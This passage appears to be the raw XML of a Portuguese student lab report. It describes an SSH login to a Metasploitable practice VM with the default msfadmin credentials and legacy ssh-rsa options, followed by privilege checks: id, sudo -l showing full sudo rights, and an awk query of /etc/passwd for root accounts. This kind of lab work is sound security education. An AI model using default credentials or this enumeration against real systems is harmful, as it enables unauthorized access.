        <w:t>Também fiz outros testes relacionados à autenticação, mas o login como root continuou não funcionando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02299B61" w14:textId="192C13C5" w:rsidR="00086496" w:rsidRPr="00367BCD" w:rsidRDefault="00086496" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AFF370B" wp14:editId="02442B0A">
            <wp:extent cx="5400040" cy="4476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856" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Depois, pesquisando sobre o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> e aproveitando o que já tinha aprendido na atividade, utilizei o usuário padrão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msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>. Para conseguir estabelecer a conexão com o servidor antigo, utilizei:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637AD275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HostKeyAlgorithms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=+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ssh-rsa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PubkeyAcceptedAlgorithms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=+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ssh-rsa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msfadmin@192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E8BCD3" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Dessa vez consegui entrar no sistema. O terminal passou a mostrar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0E130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msfadmin@metasploitable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:~$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBD610" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">Isso confirmou que eu estava dentro do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> e não mais no Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008005BF" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Para confirmar qual usuário estava conectado, executei:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69335F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40E4AC30" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>O retorno foi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAE893A" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/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msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05D33D1B" w14:textId="77777777" w:rsidR="002B6BCA" w:rsidRPr="00367BCD" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t>Depois fiz um teste simples para verificar se conseguia executar comandos e criar arquivos no sistema remoto. Utilizei:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DBEFC8" w14:textId="0C33CF6A" w:rsidR="002B6BCA" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h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echo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ola</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mundo" &gt; teste.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA8D281" w14:textId="086719C1" w:rsidR="00086496" w:rsidRPr="00367BCD" w:rsidRDefault="00086496" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7653AED1" wp14:editId="5E992174">
            <wp:extent cx="5400040" cy="4476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7D41" w14:textId="33A53948" w:rsidR="002B6BCA" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve">O comando criou o arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00367BCD">
        <w:t xml:space="preserve"> no diretório do usuário </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00367BCD">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00367BCD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64934656" w14:textId="2100109A" w:rsidR="00086496" w:rsidRPr="00367BCD" w:rsidRDefault="00086496" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00086496">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A899B48" wp14:editId="2C16E53F">
            <wp:extent cx="3705742" cy="108600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CA13" w14:textId="6F1A435B" w:rsidR="00086496" w:rsidRPr="00BE45BA" w:rsidRDefault="002B6BCA" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE45BA">
        <w:t xml:space="preserve">No final da atividade, consegui realizar o acesso SSH ao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:t xml:space="preserve"> utilizando o usuário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msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:t xml:space="preserve"> e executar comandos diretamente no terminal remoto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09196B69" w14:textId="77777777" w:rsidR="00086496" w:rsidRPr="00BE45BA" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE45BA">
        <w:t>Depois de conseguir o acesso SSH como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:t>, continuei verificando quais permissões o usuário possuía no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A5810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Primeiro utilizei:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C512B23" w14:textId="77777777" w:rsidR="00086496" w:rsidRPr="00BE45BA" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00F0C8F1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O resultado confirmou novamente que eu estava conectado como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30597655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Em seguida utilizei:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731D57DE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rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C0E5CF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O comando mostrou que o usuário fazia parte de vários grupos administrativos, incluindo o grupo </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE45BA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D05B3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Depois executei:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16107328" w14:textId="77777777" w:rsidR="00086496" w:rsidRPr="00BE45BA" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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sudo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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E71D1" w14:textId="77777777" w:rsidR="00086496" w:rsidRPr="00BE45BA" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE45BA">
        <w:t>Após informar a senha do usuário, o servidor retornou:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B011FCF" w14:textId="05657A0B" w:rsidR="00086496" w:rsidRPr="00BE45BA" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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User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msfadmin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may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run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the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commands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on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5BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> host:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(ALL) ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2107B327" w14:textId="38D6AC7C" w:rsidR="00086496" w:rsidRPr="00086496" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EA3D3BC" wp14:editId="2D647214">
            <wp:extent cx="5400040" cy="44767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53F0" w14:textId="77777777" w:rsidR="00086496" w:rsidRPr="00086496" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="00086496">
        <w:t>Isso mostrou que o usuário </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00086496">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00086496">
        <w:t> possuía permissão para executar comandos com privilégios administrativos através do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00086496">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00086496">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D571541" w14:textId="77777777" w:rsidR="00086496" w:rsidRPr="00086496" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="00086496">
        <w:t>Também utilizei:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D703DA" w14:textId="77777777" w:rsidR="00086496" w:rsidRPr="00BE45BA" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>awk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -F: '$3 == 0 {print $1}' /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE45BA">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33BBA69A" w14:textId="23F09A7D" w:rsidR="00086496" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="00086496">
        <w:t>O resultado mostrou o usuário </w:t>
      </w:r>
      <w:r w:rsidRPr="00086496">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00086496">
        <w:t>, confirmando a existência da conta administrativa do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6063618F" w14:textId="4E9CFB6D" w:rsidR="00BE45BA" w:rsidRPr="00086496" w:rsidRDefault="00BE45BA" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776676EF" wp14:editId="369FFBB0">
            <wp:extent cx="5400040" cy="44767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24B5" w14:textId="77777777" w:rsidR="00086496" w:rsidRPr="00086496" w:rsidRDefault="00086496" w:rsidP="00086496">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="00086496">
        <w:t>Com esses testes, confirmei que o acesso SSH obtido como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00086496">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00086496">
        <w:t xml:space="preserve"> possuía privilégios administrativos no servidor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00086496">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00086496">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C5113A" w14:textId="77777777" w:rsidR="00086496" w:rsidRPr="00367BCD" w:rsidRDefault="00086496" w:rsidP="002B6BCA">
      <w:pPr>
        <w:pStyle w:val="x1yc453h"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328F80D5" w14:textId="77777777" w:rsidR="00753444" w:rsidRPr="00367BCD" w:rsidRDefault="00753444" w:rsidP="002B6BCA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00753444" w:rsidRPr="00367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CA"/>
    <w:rsid w:val="00086496"/>
    <w:rsid w:val="002B6BCA"/>
    <w:rsid w:val="00367BCD"/>
    <w:rsid w:val="00753444"/>
    <w:rsid w:val="00B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3A9A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BD982232-4455-4F51-B0C3-EB3FA394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6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2B6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B6BC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x1yc453h">
    <w:name w:val="x1yc453h"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002B6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B6BC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6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6BC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B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B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B6BC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994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cp:lastPrinted>2026-10-07T14:02:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-07T13:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-07T14:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>